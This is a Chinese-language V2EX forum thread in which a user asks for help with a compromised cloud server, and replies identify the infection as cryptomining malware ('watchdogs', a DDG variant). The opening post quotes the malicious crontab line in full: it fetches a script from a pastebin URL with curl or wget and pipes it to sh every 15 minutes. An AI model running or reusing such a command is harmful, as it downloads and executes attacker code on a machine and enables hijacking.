阿里云服务器被挂马,被写入 crontab 删不掉。ps 命令找不到 nginx PHP 进程信息

2019-02-21 14:14:13 +08:00
 hobbyliu

*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh

crontab 被写入这段代码。删除后一会又自动加上。

ps 命令看到的进程很奇怪,php nginx 进程找你不到了,但是服务正常。

怀疑 ps 被修改, 已经从其他服务器替换了回来,但是依旧不行。

6996 次点击
所在节点    信息安全
26 条回复
hobbyliu
2019-02-22 17:38:32 +08:00
@sdksang ddg 的变异,用处理的 ddg 的方法根本处理不了。
hyshuang2006
2019-02-22 21:48:48 +08:00
哎...我的 VPS 惨了,连 root 都进不去。
hobbyliu
2019-02-23 06:16:23 +08:00
@hyshuang2006 你设置的不允许密码登录?
hyshuang2006
2019-02-23 20:06:51 +08:00
@hobbyliu 对啊,密钥登陆。原来密钥登陆也存在隐患。唉...

不过也是好事情,这回找时间充电,认真对待:补写脚本及安全方面。
metas
2019-02-26 11:26:57 +08:00
应该是被被植入了 watchdogs 挖矿病毒,楼主可以看看腾讯安全云鼎实验室的清理方式:

https://mp.weixin.qq.com/s/3V0HVEREZWU8SkRWLspaxg
hobbyliu
2019-02-26 13:34:52 +08:00
@metas 感谢 我研究下

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/537247

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX